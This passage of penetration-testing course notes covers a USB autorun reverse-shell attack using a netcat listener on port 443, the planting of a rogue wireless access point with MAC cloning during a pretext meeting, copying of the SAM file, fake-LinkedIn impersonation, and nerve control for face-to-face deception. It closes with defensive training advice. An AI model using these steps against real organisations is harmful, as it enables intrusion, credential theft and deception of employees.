the ISO is saved and written to the flash drive using the LPInstaller tool.
• When the USB is inserted into a target machine, the script automatically runs and
initiates a reverse shell connection to a specified IP for remote access.
• C:\nc -l -p 443
• Port 443 is typically used for secure HTTPS traffic, making it a strategic choice
for attackers because its encrypted nature helps evade firewalls and intrusion
detection systems. In this context, Netcat is used to establish a reverse shell
connection over port 443, blending in with normal encrypted web traffic.
• If successful, the attacker receives a command prompt on their machine, showing
the drive letter assigned to the USB device (U3 file system) on the target machine.
This confirms that the reverse shell has been established and the attacker now has
remote command-line access to the victim’s system.
• The example uses basic tools like Netcat and VBScript to create a
reverse shell (a simple remote access Trojan), more advanced and
stealthy attacks can be developed using similar methods.
• Once familiar with crafting ISO images for USB drives, an attacker
can upgrade the payload—for example, replacing LaunchU3.exe with
a custom Trojan to bypass autorun restrictions.
• Another tactic involves placing a malicious document with an enticing
name on the USB to lure the user into triggering an exploit manually.
Essentially, the flexibility of USB-based attacks makes them limited
only by the attacker’s creativity and technical skill.
The Meeting
• The goal of this attack is to place an unauthorized wireless access point (WAP) on the
corporate network
• This attack requires face-to-face contact with the target. A pretext for a meeting is
required, such as a desire to purchase goods or services on a level that requires a faceto-
• face meeting. Set the meeting time for just after lunch and arrive about 30 to 45 minutes
before your meeting, with the goal of catching your victim away at lunch. Explain
• to the receptionist that you have a meeting scheduled after lunch but were in the area on
other business and decided to come early. Ask whether it is okay to wait for the person to
return from lunch.
• Have an accomplice phone you shortly after you enter the building, act slightly flustered
after you answer your phone, and ask the receptionist if there is some place you can take
your call privately. Most likely you’ll be offered a conference room.
• Once inside the conference room, close the door, find a wall jack, and install your
wireless access point. Have some Velcro or double-sided sticky tape handy to secure it
out of view (behind a piece of furniture, for instance) and a good length of cable to wire it
into the network.
• If you have time, you may also want to clone the MAC address of a computer in the
room and then wire that computer into your access point in the event they’re using port-
level access control. This ruse should provide enough time to set up the access point.
• Be prepared to stay in the room until you receive confirmation from your team that the
access point is working and they have access to the network.
• Once you receive notification that they have access, inform the receptionist that an
emergency has arisen and that you’ll call to reschedule your appointment.
• The beauty of this attack is that it is often successful and usually only exposes one team
member to a single target employee, a receptionist in most cases. It’s low tech and
inexpensive as well.
• In our example, we’re going to use a Linksys Wireless Access Point and configure it for
MAC cloning. For this example, you’ll need
• A Linksys Wireless Access Point
• Double-sided Velcro tape or sticky tape
• A 12-inch or longer CAT5 patch cable
• Get the wireless device ready by sticking double-sided tape to it so you can quickly
hide it later.
• Carry tools like a screwdriver, knife, duct tape, and power adapters in case there are
setup problems.
• Bring a flash drive and a bootable Linux USB or CD like Ubuntu or Knoppix to use
on any computer in the room.
• When you're in the conference room, check if there's a computer, then unplug its
network cable.
• Try to boot the computer using your Linux USB or CD instead of the normal
system.Connect the computer to your wireless device so it gets an internet address
from it.
• Open a browser and go to 192.168.1.1 to access the wireless device's settings.
• Turn on MAC address cloning so the device copies the computer’s ID and avoids
getting blocked by the network.
• After setting up the WAP, save the settings, and if MAC cloning isn’t automatic, use
ifconfig on Linux or ipconfig /all on Windows to find the MAC address.
• Identify the active network interface and manually enter its MAC address into the
WAP settings.
• Plug the WAP into the same wall jack the conference room computer was using, so
the WAP sits between the computer and the network.
• This makes the network think the same computer is still connected, helping avoid
detection due to MAC address matching.
• Be aware that putting the PC behind the WAP may limit network visibility and could
eventually raise suspicion.
• Have a teammate outside the building test if they can connect to the WAP and access
the corporate network.
• While still using the Linux system on the PC, try to copy sensitive files like the SAM
file for later password cracking.
• If the setup works, leave and say you’ll reschedule; if it fails, remove everything to
avoid leaving evidence behind.
Join the Company
• The attacker creates a fake social media profile pretending to work at the target company
and starts connecting with real employees, especially through LinkedIn.
• Once a few employees accept the connection request, others are more likely to accept too,
making the fake profile seem more legitimate.
• The attacker follows posts, group activity, and private messages to gather information about
employees, their roles, and internal company culture.
• Creating a fake group for the company and inviting employees helps the attacker grow their
connections quickly and collect more detailed information.
• By monitoring conversations, the attacker looks for someone who is on vacation or away
from the office, making them a good person to impersonate.
• The attacker chooses someone who looks like a teammate and gathers enough information
to act as if they are that person.
• Using a believable excuse like needing urgent access to the office due to travel or network
issues, the attacker requests temporary access, possibly using a spoofed caller ID.
• With the collected knowledge and a fake ID badge, the attacker gains physical access, using
the trust built online to avoid suspicion and reach the internal network.
Preparing Yourself for Face-to-Face Attacks
• Talking to someone face to face during a social engineering attack is harder than doing it
online because you must react in real time and can't hide behind a screen.
• To be successful, you need to look and act relaxed, just like you’re having a normal
conversation with a friend, even if you feel nervous inside.
• If you look uncomfortable or out of place, people are more likely to notice you and question
your presence.
• Your body may respond to the stress with signs like sweating or a fast heart rate, which can
make you seem suspicious.
• Knowing your resting heart rate and keeping it within a normal range during the encounter
can help you appear calm and confident.
• You can train yourself to stay calm using relaxation techniques like meditation or by
practicing making eye contact with strangers to get used to social pressure.
• Practicing your approach and what you’ll say ahead of time can help you feel more
prepared and reduce nervous mistakes.
• Think about what you’ll carry with you, like a laptop bag or coffee cup, to keep your
hands busy and avoid awkward movements.
• Practice how you stand and where you place your hands in front of a mirror so you
don’t look stiff or nervous.
• Chewing gum or sucking on a mint can help manage nervous swallowing caused by
excess saliva during stressful face-to-face interactions.
Defending Against Social Engineering Attacks
• Social engineering attacks (SEAs) mainly target employees, not systems, so strong defenses
depend more on training than on technology.
• People often make risky decisions without realizing the danger, which makes them vulnerable
to manipulation.
• Many employees don’t take SEAs seriously because they don’t see information as valuable or
feel that such attacks are unlikely.
• Unlike money, which has clear value, data and information can seem less important to protect.
• Awareness training helps employees understand the real risks and the importance of protecting
company data.
• Showing real-world examples of social engineering helps employees see that these threats are
serious and not just theoretical.
• Simulated social engineering attacks should be used regularly to test how well employees are
applying what they’ve learned.
• The results from these tests can improve future training and help make the organization more
secure over time.

You might also like